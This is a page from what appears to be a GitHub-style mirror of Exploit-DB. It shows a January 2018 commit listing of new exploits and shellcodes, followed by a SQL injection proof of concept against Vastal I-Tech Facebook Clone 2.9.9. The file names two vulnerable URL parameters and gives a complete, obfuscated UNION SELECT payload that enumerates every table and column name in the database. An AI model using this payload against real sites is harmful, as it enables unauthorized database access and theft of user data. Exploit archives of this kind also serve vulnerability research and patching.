bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/43918.txt
Offensive Security acaa042761 DB: 2018-01-29 
21 changes to exploits/shellcodes

Artifex MuJS 1.0.2 - Denial of Service
Artifex MuJS 1.0.2 - Integer Overflow

BMC BladeLogic 8.3.00.64 - Remote Command Execution
Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection
Gnew 2018.1 - Cross-Site Request Forgery
Nexpose < 6.4.66 - Cross-Site Request Forgery
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
Task Rabbit Clone 1.0 - 'id' SQL Injection
TSiteBuilder 1.0 - SQL Injection
Hot Scripts Clone - 'subctid' SQL Injection
Multilanguage Real Estate MLM Script 3.0 - 'srch' SQL Injection
Buddy Zone 2.9.9 - SQL Injection
Netis WF2419 Router - Cross-Site Request Forgery
KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery

Linux/x86 - Egghunter Shellcode (12 Bytes)
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)
2018-01-29 05:01:45 +00:00

27 lines
No EOL
919 B
Text
Raw Blame History

# # # # #
# Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://vastal.com/
# Software Link: http://vastal.com/buddy-zone-social-networking-script.html
# Version: 2.9.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/chat_im/chat_window.php?request_id=[SQL]
#
# -551++/*!13337UNION*/+/*!13337SELECT*/+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+-
#
# http://localhost/[PATH]/search_events.php?category=[SQL]
#
# # # # #
Reference in a new issue View git blame Copy permalink